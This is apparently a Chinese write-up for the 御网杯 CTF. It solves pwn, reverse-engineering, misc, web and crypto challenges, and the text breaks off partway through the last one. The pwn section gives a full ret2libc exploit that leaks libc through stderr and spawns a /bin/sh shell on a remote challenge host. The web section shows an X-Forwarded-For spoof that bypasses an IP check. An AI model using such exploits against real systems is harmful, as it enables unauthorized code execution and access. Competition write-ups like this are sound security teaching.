御网杯 WP

PWN

ez_pwn

因为关闭了stdout,所以不能直接输出了,于是可以将输出写到stderr,然后再泄露地址,打ret2libc

from pwn import *

# Target Linux/amd64; the 'debug' log level makes pwntools print all traffic.
context(os='linux', arch='amd64', log_level='debug')

# Challenge binary and the libc it is expected to run against.
file_name = "./pwn"
elf = ELF(file_name)
libc = ELF("./libc-2.31.so")

# select == 1 starts the binary locally; any other value connects to the
# remote challenge instance.
select = 0
io = process(file_name) if select == 1 else remote('47.105.113.86', 30003)

#gdb.attach(io)

#-------------- EXP -------------------#

# Short aliases for the tube methods of the global `io` connection.
# `io` is looked up at call time, exactly as in a lambda.
def sd(s):
    """Send raw bytes."""
    return io.send(s)


def sl(s):
    """Send bytes followed by a newline."""
    return io.sendline(s)


def sa(n, s):
    """Wait for delimiter `n`, then send `s`."""
    return io.sendafter(n, s)


def sla(n, s):
    """Wait for delimiter `n`, then send `s` plus a newline."""
    return io.sendlineafter(n, s)


def rc(n):
    """Receive up to `n` bytes."""
    return io.recv(n)


def rl():
    """Receive one line."""
    return io.recvline()


def ru(s):
    """Receive until delimiter `s` is seen."""
    return io.recvuntil(s)


def ra():
    """Receive until the connection closes."""
    return io.recvall()


def it():
    """Hand the connection over to the terminal."""
    return io.interactive()

#-------------- END -------------------#

  

# Wait for the service banner before sending anything.
ru(b'blind now.')

  

# Hard-coded code addresses inside ./pwn. Judging by the names these are
# gadget / call-site addresses - presumably found with a gadget finder; they
# cannot be verified from this listing.
# NOTE(review): fixed 0x40xxxx addresses only work while the binary is not
# position-independent, and the plain overwrite below only works without a
# stack canary - confirm with checksec. Building with PIE and stack protector
# would break the chain as written.
pop_rdi = 0x4012c3

pop_rsi_r15 = 0x4012c1

write1 = 0x40122A

# `main` is defined but never used below.
main = 0x401207

ret = 0x40101a

  

# Earlier attempt kept for reference: the same chain, but with fd 1 (stdout).
# The write-up states stdout is closed, so this variant produces no output.
#payload  = b'a'*0x20 + p64(0xdeadbeef)

#payload += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['write']) + p64(0) + p64(write1)

#payload += p64(pop_rdi) + p64(2) + p64(0x40123E)

#sl(payload)

  

# Stage 1: 0x20 filler bytes plus one 8-byte placeholder, followed by a chain
# that loads 2 (stderr) and the GOT slot of write() into the first two
# argument registers and then jumps to write1. The intent, per the write-up,
# is to print the resolved address of write() on stderr.
payload  = b'a'*0x20 + p64(0xdeadbeef)

payload += p64(pop_rdi) + p64(2) + p64(pop_rsi_r15) + p64(elf.got['write']) + p64(0) + p64(write1)

sl(payload)

  

# Read up to the first 0x7f byte, keep the last 6 bytes and zero-pad them to
# 8 so they can be unpacked as a 64-bit value.
write_addr = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))

success("write_addr: " + hex(write_addr))

  

# Derive the libc load address from the leaked write() address, then compute
# the addresses of system() and of a "/bin/sh" string inside libc.
# This is only correct if ./libc-2.31.so matches the libc the target uses.
libcbase = write_addr - libc.symbols['write']

system = libcbase + libc.symbols['system']

binsh = libcbase + next(libc.search(b'/bin/sh'))

  

# Discard 506 bytes of pending output. The count is a magic number whose
# origin is not shown - presumably the rest of the leaked buffer; TODO confirm.
rc(506)

# Stage 2: same filler as stage 1, then a chain that passes the "/bin/sh"
# pointer as first argument and calls system(). The second and third values
# after pop_rsi_r15 are zeroes; the extra `ret` before system is presumably
# there for 16-byte stack alignment - confirm against the binary.
payload1  = b'a'*0x20 + p64(0xdeadbeef)

payload1 += p64(pop_rdi) + p64(binsh) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(ret) + p64(system)

sl(payload1)

  

# Switch to interactive mode to use the resulting session.
it()

执行

cat /flag >&2

image.png

re

ez_math

先使用 pyinstxtractor 将 exe 解包,然后将得到的 pyc 文件交给 PyLingual 反编译,再根据反编译结果编写如下 z3 求解脚本

from z3 import Solver

def zini(length):
    """Create ``length`` symbolic flag bytes.

    Returns a pair ``(flag, out)``. Both elements are the *same* list of
    8-bit z3 bit-vectors named ``flag[0]`` .. ``flag[length-1]``.

    NOTE(review): arithmetic on 8-bit bit-vectors wraps modulo 2**8, so any
    polynomial constraint built from these variables is checked modulo 256
    rather than over the integers. That can admit extra models; confirm the
    printed candidates against the original check.
    """
    from z3 import BitVec

    symbols = []
    for index in range(length):
        symbols.append(BitVec('flag[%d]' % index, 8))
    return symbols, symbols

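def zcheck(f, flag):
    """Print every model of solver ``f`` as a string of flag characters.

    Args:
        f: a z3 ``Solver`` that already holds the constraints.
        flag: list of z3 bit-vector variables, one per flag character.

    The result of the first ``check()`` is printed, then each satisfying
    assignment is printed on its own line. After printing a model, a blocking
    clause ("at least one variable differs") is added so the next ``check()``
    yields a different assignment or ``unsat``.

    Errors are no longer swallowed. A blanket ``except: pass`` around the loop
    body would skip the blocking clause on any failure and re-check the same
    model forever.
    """
    from z3 import Or, sat

    print(f.check())

    while f.check() == sat:
        m = f.model()
        # model_completion=True gives a concrete value even for variables the
        # constraints never mention (plain m[var] returns None for those).
        values = [m.eval(var, model_completion=True).as_long() for var in flag]
        print("".join(chr(value) for value in values))
        # Exclude exactly this assignment from further solutions.
        f.add(Or([var != value for var, value in zip(flag, values)]))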

  
  

# 38 symbolic flag bytes. zini() returns the same list twice, so `x` is just
# an alias of `flag` used to keep the equations short.
flag,x =zini(38)

s = Solver()

# 38 constraints, one per list element: each is a polynomial in the flag
# bytes (degree at most 2) that must equal zero.
# NOTE(review): x holds 8-bit bit-vectors, so the products, coefficients and
# constants below are evaluated modulo 2**8, not over the integers.
equations = [x[0] * x[16] + x[10] * x[18] + 2 * (x[11] * x[25]) + 5 * (x[13] * x[25]) - 9 * (x[13] * x[32]) - 8 * (x[15] * x[29]) + 8 * (x[17] * x[28]) + 7 * (x[19] * x[29]) - 5 * (x[19] * x[30]) - 7 * (x[19] * x[9]) - 4 * x[20] * x[20] + 7 * (x[22] * x[23]) - 5 * (x[23] * x[8]) - 8 * (x[29] * x[5]) - 7 * x[31] + 7 * (x[32] * x[9]) + 10 * (x[33] * x[4]) + 8 * x[5] * x[5] - 5 * x[8] * x[8] - 16191 == 0,

-9 * (x[1] * x[15]) - 2 * (x[10] * x[18]) + 9 * (x[11] * x[18]) - 6 * (x[12] * x[16]) - x[14] * x[15] - 3 * (x[15] * x[18]) - 9 * (x[16] * x[8]) + 10 * (x[17] * x[23]) + 4 * (x[17] * x[5]) - 2 * (x[2] * x[22]) - 4 * x[2] + 4 * (x[21] * x[3]) + 10 * (x[23] * x[25]) + 5 * (x[28] * x[33]) + 10 * (x[28] * x[5]) - 8 * (x[30] * x[36]) - 14067 == 0,

10 * (x[0] * x[26]) + 6 * (x[0] * x[29]) - 7 * (x[13] * x[29]) + 8 * (x[21] * x[7]) + 9 * (x[22] * x[25]) - 8 * (x[23] * x[5]) + 8 * (x[26] * x[32]) + 5 * (x[27] * x[30]) + 9 * (x[27] * x[31]) + 6 * (x[28] * x[6]) - 9 * (x[29] * x[5]) - 4 * (x[31] * x[8]) - 10 * (x[32] * x[35]) + 10 * x[35] * x[35] - 55102 == 0,

3 * (x[0] * x[16]) + 4 * (x[1] * x[36]) + 8 * (x[10] * x[33]) - 8 * (x[12] * x[17]) - 8 * (x[14] * x[28]) + 7 * (x[15] * x[25]) - 2 * (x[15] * x[6]) + 6 * (x[15] * x[8]) - 2 * (x[2] * x[25]) - 7 * (x[2] * x[34]) + x[23] * x[35] - 5 * (x[27] * x[9]) + 6 * (x[28] * x[30]) + 6 * (x[28] * x[37]) + 8 * (x[28] * x[7]) - 4 * x[30] + 7 * (x[32] * x[35]) + 7 * (x[35] * x[5]) + 7 * (x[35] * x[7]) - 10 * (x[5] * x[7]) - 2 * (x[7] * x[9]) - 102697 == 0,

7 * (x[0] * x[27]) + 3 * (x[1] * x[15]) - 9 * (x[1] * x[29]) - 3 * (x[10] * x[33]) - 10 * (x[12] * x[34]) - 8 * (x[15] * x[2]) - 8 * (x[18] * x[23]) - 6 * (x[19] * x[7]) - 6 * (x[2] * x[34]) + 7 * (x[2] * x[7]) - 3 * (x[20] * x[22]) - 8 * (x[23] * x[25]) - 3 * (x[26] * x[34]) - 9 * (x[28] * x[3]) - 8 * (x[28] * x[35]) + 3 * (x[36] * x[4]) + 6 * x[8] + 324145 == 0,

-9 * (x[0] * x[2]) + 5 * x[1] - 9 * (x[13] * x[3]) + 4 * (x[14] * x[17]) + 9 * (x[18] * x[29]) + 5 * (x[18] * x[9]) + 5 * (x[20] * x[23]) - x[20] * x[5] - 8 * (x[21] * x[33]) - 7 * x[27] + 6 * (x[28] * x[7]) - 7 * (x[29] * x[9]) + 10 * (x[31] * x[6]) + 52822 == 0,

-6 * (x[10] * x[29]) - 2 * (x[10] * x[33]) + 4 * (x[11] * x[31]) + 8 * (x[12] * x[27]) - 9 * (x[12] * x[36]) + 2 * (x[16] * x[24]) + 2 * (x[19] * x[34]) - 8 * (x[19] * x[37]) - 10 * (x[24] * x[7]) - 5 * (x[34] * x[6]) - 2 * (x[7] * x[8]) + 9 * x[9] + 119387 == 0,

6 * (x[0] * x[22]) - 3 * (x[12] * x[37]) - 3 * (x[12] * x[5]) - 2 * (x[13] * x[36]) - 10 * (x[19] * x[5]) + 7 * (x[2] * x[22]) + 7 * (x[2] * x[9]) - 8 * x[21] * x[21] + x[21] * x[34] - 5 * (x[23] * x[26]) + 9 * (x[25] * x[5]) + 8 * (x[25] * x[9]) + 4 * (x[3] * x[30]) - 3 * (x[37] * x[7]) - 6 * (x[37] * x[9]) + 4832 == 0,

-2 * x[0] * x[0] + 3 * (x[13] * x[29]) + x[17] * x[25] - 10 * (x[21] * x[28]) + 5 * (x[22] * x[31]) + 10 * (x[22] * x[9]) - 10 * (x[25] * x[32]) + 4 * x[27] + 6 * (x[29] * x[6]) - 4 * (x[30] * x[34]) - 9 * (x[31] * x[4]) + 2 * (x[32] * x[34]) - 7 * (x[4] * x[6]) + 123454 == 0,

4 * (x[0] * x[20]) + x[0] * x[3] - 9 * (x[1] * x[17]) + 9 * (x[11] * x[34]) - 6 * (x[13] * x[7]) - 6 * (x[14] * x[2]) + 6 * (x[14] * x[29]) + 7 * (x[15] * x[27]) - 7 * (x[18] * x[5]) - 7 * x[20] * x[20] + 8 * (x[20] * x[21]) + 9 * (x[20] * x[27]) + 2 * (x[21] * x[25]) - 6 * (x[25] * x[28]) - 9 * (x[28] * x[32]) - 6 * (x[3] * x[32]) - 3 * (x[33] * x[7]) - 8 * (x[36] * x[9]) + 170296 == 0,

6 * (x[0] * x[11]) + x[1] * x[12] - 9 * (x[1] * x[30]) - 10 * (x[1] * x[35]) + 8 * (x[10] * x[7]) + 5 * (x[14] * x[28]) + 7 * (x[16] * x[21]) - 10 * (x[19] * x[35]) + x[19] * x[6] + 8 * (x[2] * x[31]) - 2 * (x[21] * x[26]) - 3 * (x[23] * x[27]) + 9 * (x[27] * x[34]) + 4 * x[28] * x[28] - x[3] * x[31] + x[30] * x[37] - 9 * (x[30] * x[4]) + 4 * x[34] - 76173 == 0,

-8 * (x[0] * x[15]) - 4 * (x[11] * x[15]) + 9 * (x[12] * x[23]) - 10 * (x[12] * x[29]) + 8 * (x[13] * x[26]) + 6 * (x[13] * x[9]) - x[15] * x[27] - x[15] * x[33] + 3 * (x[19] * x[29]) - 10 * (x[2] * x[20]) - x[22] * x[32] + 5 * (x[23] * x[8]) + 6 * (x[32] * x[5]) - 27078 == 0,

8 * (x[1] * x[9]) + 8 * (x[10] * x[16]) - 3 * (x[10] * x[29]) - 2 * (x[11] * x[13]) + 6 * (x[11] * x[33]) + 3 * (x[12] * x[14]) + 8 * (x[12] * x[16]) + 5 * (x[16] * x[34]) + 7 * (x[18] * x[32]) + 8 * (x[19] * x[26]) + 2 * x[19] - 4 * (x[20] * x[6]) + 4 * x[22] * x[22] - 8 * (x[25] * x[5]) - 7 * (x[26] * x[34]) - x[29] + 10 * (x[3] * x[4]) - 6 * x[32] * x[32] - 299677 == 0,

3 * (x[0] * x[6]) + 7 * (x[10] * x[34]) + 9 * (x[11] * x[18]) - 8 * (x[12] * x[3]) - x[12] * x[33] - x[12] * x[34] - 7 * (x[16] * x[7]) + x[16] * x[8] - 3 * (x[19] * x[20]) - 6 * (x[19] * x[33]) - 8 * (x[22] * x[27]) - 4 * (x[24] * x[3]) + 57797 == 0,

9 * (x[0] * x[29]) + 2 * (x[1] * x[19]) + 8 * (x[10] * x[30]) - 2 * (x[11] * x[20]) - 6 * (x[11] * x[29]) + 3 * (x[13] * x[20]) - 10 * (x[14] * x[17]) - 10 * (x[15] * x[19]) + 6 * (x[15] * x[23]) + 7 * (x[15] * x[4]) + 6 * (x[18] * x[28]) + x[19] * x[3] - x[20] * x[3] - 10 * (x[21] * x[30]) + 10 * (x[22] * x[27]) - 10 * (x[23] * x[31]) + 2 * (x[24] * x[5]) - 3 * (x[25] * x[31]) + 5 * (x[26] * x[7]) + 7 * x[3] * x[3] + 7 * (x[30] * x[32]) + 6 * (x[31] * x[5]) + 10 * x[33] - 7 * x[5] - 258015 == 0,

2 * (x[0] * x[16]) - 6 * (x[1] * x[20]) + 5 * (x[10] * x[17]) - 5 * (x[15] * x[23]) + 8 * (x[16] * x[18]) + 9 * (x[19] * x[36]) + 6 * (x[2] * x[33]) - 9 * (x[23] * x[9]) + 9 * x[25] * x[25] + 2 * (x[3] * x[37]) + 7 * (x[30] * x[34]) - 2 * x[32] - 157310 == 0,

-3 * (x[0] * x[25]) - 2 * (x[1] * x[36]) + 2 * (x[10] * x[31]) + 9 * (x[13] * x[20]) - 5 * (x[15] * x[2]) - 6 * (x[15] * x[37]) - 2 * x[17] + 8 * (x[19] * x[28]) + 7 * (x[2] * x[32]) - 2 * (x[21] * x[30]) + 5 * (x[23] * x[5]) + 5 * (x[24] * x[26]) - 8 * (x[24] * x[33]) - 8 * (x[26] * x[35]) - 10 * x[26] - 10 * (x[29] * x[36]) - 2 * (x[30] * x[6]) + 4 * (x[31] * x[36]) + 9 * (x[33] * x[9]) - x[37] * x[6] + 7350 == 0,

-8 * (x[0] * x[36]) - 8 * (x[17] * x[32]) + 8 * (x[2] * x[33]) - 7 * (x[22] * x[28]) - 9 * (x[22] * x[35]) + 8 * (x[22] * x[5]) - 2 * (x[23] * x[5]) + 5 * (x[26] * x[27]) + 6 * (x[26] * x[31]) - 3 * (x[32] * x[33]) - 2 * (x[35] * x[4]) + x[36] * x[8] + 85362 == 0,

7 * (x[0] * x[33]) - 5 * (x[12] * x[35]) + x[12] * x[9] + 10 * (x[13] * x[30]) + 8 * (x[15] * x[32]) - 9 * (x[2] * x[20]) + 3 * (x[2] * x[30]) + 10 * (x[25] * x[29]) - 6 * (x[26] * x[32]) - 3 * (x[27] * x[9]) + 7 * (x[36] * x[6]) - 121182 == 0,

8 * (x[0] * x[17]) + 10 * (x[1] * x[14]) + 2 * (x[10] * x[33]) + 8 * (x[13] * x[26]) - 5 * (x[14] * x[34]) - 9 * (x[14] * x[7]) + x[18] * x[2] - 10 * (x[18] * x[7]) + x[2] * x[33] + 10 * x[20] - 6 * (x[22] * x[30]) + 6 * (x[22] * x[9]) + 10 * (x[23] * x[34]) + 9 * (x[25] * x[9]) + 7 * (x[26] * x[30]) - 9 * (x[27] * x[31]) + 7 * (x[28] * x[5]) - 8 * (x[30] * x[31]) - 9 * x[34] * x[34] + 2 * (x[36] * x[8]) - 136304 == 0,

-4 * (x[0] * x[25]) - 9 * (x[1] * x[21]) - 9 * (x[1] * x[25]) + 6 * (x[12] * x[5]) + 6 * (x[2] * x[28]) - 4 * (x[20] * x[28]) - 8 * (x[22] * x[23]) + 5 * (x[23] * x[32]) - 6 * (x[24] * x[28]) - 6 * (x[25] * x[29]) + 121526 == 0,

-4 * (x[0] * x[30]) + x[11] * x[14] - 6 * (x[12] * x[20]) - 8 * (x[13] * x[28]) + 10 * (x[15] * x[2]) - 10 * (x[18] * x[25]) + 6 * (x[22] * x[29]) - 3 * (x[25] * x[8]) + x[27] * x[36] - 2 * (x[3] * x[30]) + 10 * (x[30] * x[34]) + 4 * (x[35] * x[6]) - 27523 == 0,

-9 * (x[10] * x[30]) - 3 * (x[10] * x[6]) - 10 * (x[13] * x[29]) - 8 * (x[13] * x[7]) + 3 * (x[14] * x[32]) - 2 * (x[18] * x[20]) + 10 * (x[18] * x[34]) - 4 * (x[2] * x[7]) + 9 * (x[20] * x[22]) - 5 * (x[20] * x[33]) - 10 * (x[23] * x[34]) - 6 * x[26] + 2 * (x[3] * x[34]) + 9 * x[30] * x[30] + 8 * (x[31] * x[8]) + 9 * (x[33] * x[36]) + 35830 == 0,

7 * (x[10] * x[2]) + 2 * x[10] - 5 * (x[13] * x[9]) + 10 * (x[15] * x[33]) + 8 * (x[17] * x[23]) + 5 * x[2] * x[2] - 8 * (x[2] * x[37]) + 6 * (x[20] * x[24]) + 4 * (x[20] * x[35]) - 8 * (x[23] * x[8]) - 9 * (x[24] * x[7]) + 7 * (x[26] * x[8]) - 5 * (x[3] * x[36]) + 6 * (x[30] * x[35]) - 7 * x[36] - 5 * x[7] - 59235 == 0,

-8 * x[11] * x[11] - 9 * (x[14] * x[31]) - 8 * (x[14] * x[35]) + 7 * (x[15] * x[20]) + x[15] * x[24] + 6 * (x[15] * x[25]) - 10 * (x[16] * x[18]) - x[16] * x[9] + 8 * (x[19] * x[32]) + 5 * (x[2] * x[5]) + 6 * (x[21] * x[30]) - 10 * (x[22] * x[24]) + 2 * (x[22] * x[34]) - 10 * (x[22] * x[37]) + 4 * (x[27] * x[35]) - x[28] * x[33] + 2 * (x[28] * x[37]) + 7 * (x[29] * x[37]) - 2 * (x[34] * x[35]) - 7 * (x[35] * x[6]) + 82407 == 0,

7 * (x[0] * x[27]) + 7 * (x[10] * x[21]) - 10 * (x[10] * x[3]) + 6 * (x[13] * x[36]) - 3 * (x[15] * x[17]) + 7 * (x[15] * x[30]) - x[15] * x[7] + x[16] * x[34] + 8 * (x[17] * x[37]) + 2 * x[2] + 6 * (x[20] * x[21]) + 9 * (x[20] * x[33]) + 8 * (x[20] * x[4]) + 3 * (x[21] * x[25]) + x[22] * x[28] + 6 * x[23] * x[23] - 6 * (x[24] * x[3]) + 10 * (x[25] * x[27]) + 5 * (x[29] * x[4]) - 6 * (x[3] * x[32]) - 6 * (x[30] * x[4]) - 5 * (x[30] * x[5]) - x[33] * x[34] - 7 * (x[4] * x[9]) - 4 * (x[7] * x[9]) - 154206 == 0,

2 * x[0] * x[0] + 2 * (x[0] * x[14]) + 7 * (x[11] * x[13]) - 9 * (x[11] * x[16]) + 2 * (x[11] * x[21]) + 8 * (x[11] * x[24]) + 5 * (x[11] * x[4]) + 4 * (x[13] * x[36]) - 8 * (x[15] * x[16]) - 4 * (x[16] * x[17]) - 3 * (x[16] * x[23]) - 8 * (x[17] * x[33]) - 4 * (x[17] * x[34]) - 6 * (x[18] * x[31]) + 7 * (x[2] * x[25]) - x[20] * x[25] + 5 * (x[20] * x[9]) + 2 * (x[21] * x[26]) - 5 * (x[21] * x[5]) + 4 * (x[22] * x[35]) - 7 * (x[23] * x[9]) - 10 * (x[31] * x[7]) + 156020 == 0,

-5 * (x[12] * x[34]) + 4 * (x[12] * x[9]) - 2 * (x[13] * x[31]) + x[14] * x[9] + 4 * (x[17] * x[32]) - 2 * (x[18] * x[23]) - 10 * (x[18] * x[29]) + 6 * (x[19] * x[30]) + 4 * (x[2] * x[32]) - 9 * x[27] * x[27] - 2 * (x[3] * x[35]) - 2 * (x[3] * x[5]) - 2 * (x[7] * x[8]) + 129397 == 0,

-9 * x[1] + 5 * (x[12] * x[2]) + 4 * (x[12] * x[35]) - 5 * (x[14] * x[8]) + 2 * x[15] + 3 * (x[17] * x[22]) - 3 * (x[17] * x[23]) + 9 * (x[18] * x[33]) - 5 * (x[20] * x[23]) - 8 * (x[20] * x[34]) - 8 * (x[29] * x[6]) + 70585 == 0,

x[0] * x[1] + 6 * (x[0] * x[12]) + 10 * (x[10] * x[31]) + 8 * (x[11] * x[32]) + 9 * (x[13] * x[14]) - 2 * (x[15] * x[33]) - 9 * (x[15] * x[9]) + 4 * (x[16] * x[9]) - 2 * (x[18] * x[29]) - 5 * (x[2] * x[36]) + 2 * (x[21] * x[32]) - 8 * (x[24] * x[33]) + 9 * (x[25] * x[26]) + x[26] * x[28] - x[26] * x[3] - 3 * (x[26] * x[6]) + 6 * x[29] - 2 * (x[37] * x[7]) - 119430 == 0,

x[0] * x[2] + 10 * x[10] + 6 * (x[12] * x[18]) - 5 * (x[12] * x[35]) + 9 * (x[13] * x[29]) - 2 * (x[14] * x[37]) + 10 * (x[15] * x[23]) + 7 * (x[15] * x[4]) - 5 * (x[16] * x[9]) - 9 * (x[20] * x[8]) - 4 * (x[21] * x[27]) - 5 * (x[22] * x[5]) + x[28] * x[6] + x[3] * x[36] + 8 * (x[33] * x[35]) - 144386 == 0,

-5 * (x[1] * x[12]) + 4 * (x[1] * x[6]) + 4 * (x[11] * x[5]) + 8 * (x[15] * x[20]) + 7 * (x[15] * x[22]) - 10 * (x[19] * x[29]) - 6 * x[2] * x[2] + 5 * (x[2] * x[31]) - 2 * (x[2] * x[9]) + 2 * (x[20] * x[35]) + 7 * (x[29] * x[5]) + 8 * (x[30] * x[7]) + 8 * (x[35] * x[4]) - 2 * x[37] * x[37] - 99154 == 0,

-2 * x[0] * x[0] + 5 * (x[0] * x[11]) - 10 * (x[0] * x[21]) + 9 * (x[0] * x[30]) - 2 * (x[1] * x[29]) + 6 * (x[10] * x[29]) - 9 * (x[10] * x[30]) - 8 * (x[10] * x[32]) + 9 * x[11] * x[11] - 9 * (x[11] * x[5]) - x[13] * x[17] + 5 * (x[13] * x[6]) + 9 * (x[14] * x[20]) - 10 * x[18] * x[18] - 5 * (x[19] * x[24]) + 7 * (x[2] * x[26]) + 10 * (x[20] * x[21]) - 9 * (x[24] * x[34]) - 5 * (x[24] * x[5]) - 9 * (x[26] * x[32]) - 6 * (x[30] * x[7]) - 7 * (x[32] * x[37]) + 414339 == 0,

2 * (x[0] * x[21]) - 10 * (x[0] * x[35]) + 9 * (x[11] * x[15]) - 2 * (x[12] * x[4]) + 4 * (x[16] * x[4]) + 2 * (x[17] * x[32]) - 8 * (x[2] * x[20]) + 10 * (x[21] * x[23]) + 2 * (x[21] * x[27]) - 5 * (x[21] * x[30]) + 8 * (x[22] * x[30]) + 2 * (x[25] * x[4]) + 9 * (x[28] * x[34]) + 3 * (x[30] * x[5]) + 4 * (x[33] * x[7]) - 3 * (x[6] * x[8]) - 169458 == 0,

x[10] * x[31] - 4 * (x[10] * x[4]) - x[11] * x[22] - 10 * (x[12] * x[5]) - 4 * (x[16] * x[19]) + 3 * (x[19] * x[2]) + 3 * (x[19] * x[34]) - 6 * x[19] + 4 * (x[2] * x[32]) - 8 * (x[22] * x[33]) + 8 * x[23] * x[23] + 2 * (x[24] * x[6]) + 8 * x[31] + 2 * (x[5] * x[7]) - 26425 == 0,

8 * (x[1] * x[35]) - 3 * (x[1] * x[7]) - 3 * (x[14] * x[23]) - 6 * (x[16] * x[28]) - 2 * (x[16] * x[6]) - 7 * x[16] + 4 * (x[2] * x[4]) + x[21] * x[24] - 5 * (x[23] * x[3]) - 9 * (x[24] * x[30]) + 9 * (x[26] * x[35]) - 8 * (x[28] * x[4]) - 9 * (x[3] * x[32]) + 2 * x[3] + 209624 == 0,

-10 * (x[0] * x[28]) + 2 * (x[0] * x[3]) + 8 * (x[10] * x[30]) - x[11] * x[31] + 6 * (x[13] * x[32]) + 10 * (x[14] * x[36]) + 5 * (x[15] * x[23]) + 2 * (x[15] * x[31]) + 2 * (x[16] * x[25]) + 10 * (x[16] * x[30]) - 10 * (x[18] * x[22]) + 8 * (x[19] * x[6]) - 7 * (x[2] * x[36]) - x[21] * x[29] - 4 * (x[24] * x[4]) + 8 * (x[26] * x[5]) + 10 * (x[31] * x[5]) - 5 * (x[32] * x[7]) - 4 * (x[36] * x[5]) - 146637 == 0,

-2 * (x[1] * x[23]) + 9 * (x[10] * x[9]) + 9 * (x[15] * x[21]) + 10 * (x[16] * x[25]) + 5 * (x[16] * x[36]) + 7 * (x[16] * x[6]) + 7 * (x[18] * x[35]) + 8 * (x[19] * x[3]) - 9 * (x[19] * x[35]) + 10 * (x[2] * x[32]) + 5 * (x[2] * x[4]) - x[21] * x[27] - 6 * (x[24] * x[35]) - 3 * (x[25] * x[26]) + 6 * (x[29] * x[36]) + 6 * (x[29] * x[4]) - 3 * (x[33] * x[4]) - 5 * (x[34] * x[5]) - 3 * (x[37] * x[7]) + 9 * (x[4] * x[8]) - 422738 == 0,

]

  

# Register all constraints in one call, then enumerate and print every
# satisfying assignment.
s.add(*equations)
zcheck(s, flag)

image.png

misc

ez_misc

M1BMSkhDNFQ2Z2hWbWJHZURZclA3Yk04RmFXbWNza1k=

先转化为 ASCII,得到一个 base64 字符串,然后解码得到

3PLJHC4T6ghVmbGeDYrP7bM8FaWmcskY

然后base58得到

synt{UAPGS2lcMELmSrU6H}

凯撒(Caesar)解码得到 flag(synt → flag,偏移量为 13,即 ROT13)

image.png


image.png

光隙中的寄生密钥

image.png

通过binwalk之后得到一个压缩包,打开压缩包

image.png

得到一个加密的压缩包,爆破得到密码

image.png

得到数据

5a6d78685a3373355447306b576d493151484a554e434e6a546a647166513d3d

先将十六进制转化为 ASCII,得到一个 base64 字符串,然后再进行 base64 解码

image.png

image.png

flag为 flag{9Lm$Zb5@rT4#cN7j}

被折叠的显影图纸

题目给了一个 xls 文件,发现有密码,用 010 Editor 打开搜索 flag{ 找到 flag
image.png

flag{0ph!c3_3@5y_Kr4?k3d}

套娃

给了一个 xls 文件,利用 foremost 提取文件,得到一个 zip 文件,解压发现是一个 txt 文件,image.png

再次使用foremost提取

得到一个docx文件

image.png

发现存在隐藏文本:

flag{HNCTFdejgf8OhT}

ez_xor

题目给了一个txt文件

image.png

发现异或一个0x39即可

# Ciphertext bytes taken from the challenge's txt file.
cipher_hex = [
    0x5f, 0x55, 0x58, 0x5e, 0x42, 0x71, 0x7a, 0x6d,
    0x7f, 0x48, 0x4e, 0x5c, 0x78, 0x6a, 0x7d, 0x08,
    0x0e, 0x0a, 0x44
]

# Single-byte XOR key.
key = 0x39

# XOR every byte with the key; latin-1 maps each byte value 0..255 to the
# code point of the same number, which is what chr() does per byte.
plaintext = bytes(b ^ key for b in cipher_hex).decode('latin-1')
print(plaintext)

WEB

easyweb

image.png

image.png

YWB_Web_xff

image.png

发现只有 2.2.2.1 这个 IP 才能登录,所以可以修改 X-Forwarded-For 请求头来绕过。根本原因是服务端直接信任了客户端可控的 X-Forwarded-For;修复方式是只采信可信反向代理写入的该请求头,或直接以连接的对端地址做判断。

image.png

Crypto

baby_rsa

用 010 Editor 打开文本,得到题目,使用 yafu 分解 n,

输入拿到的n

然后打开factor.log

获得p

image.png

运行脚本

from Crypto.Util.number import *

# Public modulus from the challenge file.
n = 12194420073815392880989031611545296854145241675320130314821394843436947373331080911787176737202940676809674543138807024739454432089096794532016797246441325729856528664071322968428804098069997196490382286126389331179054971927655320978298979794245379000336635795490242027519669217784433367021578247340154647762800402140321022659272383087544476178802025951768015423972182045405466448431557625201012332239774962902750073900383993300146193300485117217319794356652729502100167668439007925004769118070105324664379141623816256895933959211381114172778535296409639317535751005960540737044457986793503218555306862743329296169569

# One prime factor of n, as read from the factoring tool's log.
p = 110428348144013242234907008083355974834266917027228724749730385104087025249352345946164980361082178532313669767485270254326404723948153912910688118140621712922649644396733499972695482991866293857864311557686710317462165131360819813493524457615383204504505224030129953230866877990529769205769592709254542472051

# NOTE(review): floor division - q is only the cofactor if p divides n exactly.
q = n // p

# Public exponent and ciphertext.
e = 65537
c = 4504811333111877209539001665516391567038109992884271089537302226304395434343112574404626060854962818378560852067621253927330725244984869198505556722509058098660083054715146670767687120587049288861063202617507262871279819211231233198070574538845161629806932541832207041112786336441975087351873537350203469642198999219863581040927505152110051313011073115724502567261524181865883874517555848163026240201856207626237859665607255740790404039098444452158216907752375078054615802613066229766343714317550472079224694798552886759103668349270682843916307652213810947814618810706997339302734827571635179684652559512873381672063

# Private exponent: inverse of e modulo (p-1)(q-1); then textbook RSA decryption.
totient = (p - 1) * (q - 1)
d = pow(e, -1, totient)
m = pow(c, d, n)

print(long_to_bytes(m))

cry_rsa

题目说
在一次RSA密钥对生成中,假设p=473398607161,q=4511491,e=19
求解出d,然后把d的值加6为flag值。flag格式为flag{********}

我们可以计算:

  • $n = p \times q$

  • $\phi(n) = (p-1)(q-1)$

  • $d \equiv e^{-1} \pmod{\phi(n)}$

# Parameters given in the challenge statement.
p = 473398607161
q = 4511491
e = 19

# Euler's totient of n = p * q, in expanded form: (p-1)(q-1) = pq - p - q + 1.
phi = p * q - p - q + 1
# Private exponent: modular inverse of e modulo phi
# (three-argument pow with exponent -1 needs Python 3.8+).
d = pow(e, -1, phi)
# The challenge defines the flag value as d + 6.
flag = d + 6
print(f"flag{{{flag}}}")

flag{2023326077889096385}

gift

五一劳动节爸爸给家里人带了一个礼物。由于礼物不好拿,所以把礼物平均分成了四份,但是其中一份不小心掉在地上散落成了无数片,变成了 1 - 1/3 + 1/5 - 1/7 + …
聪明的你能算出或猜出爸爸带的礼物是什么吗?flag示例: flag{apple} flag{watermelon} 提交的 flag 值需先用凯撒密码加密(偏移量 3)再提交。

1 - 1/3 + 1/5 - 1/7 + … 是莱布尼茨级数,和为 π/4,所以四份合起来就是 π,礼物即 pie。再按提示用凯撒密码加密,偏移量为 3,pie → slh

flag{slh}

easy-签到题

010打开获得一串编码

image.png

先解base64
得到
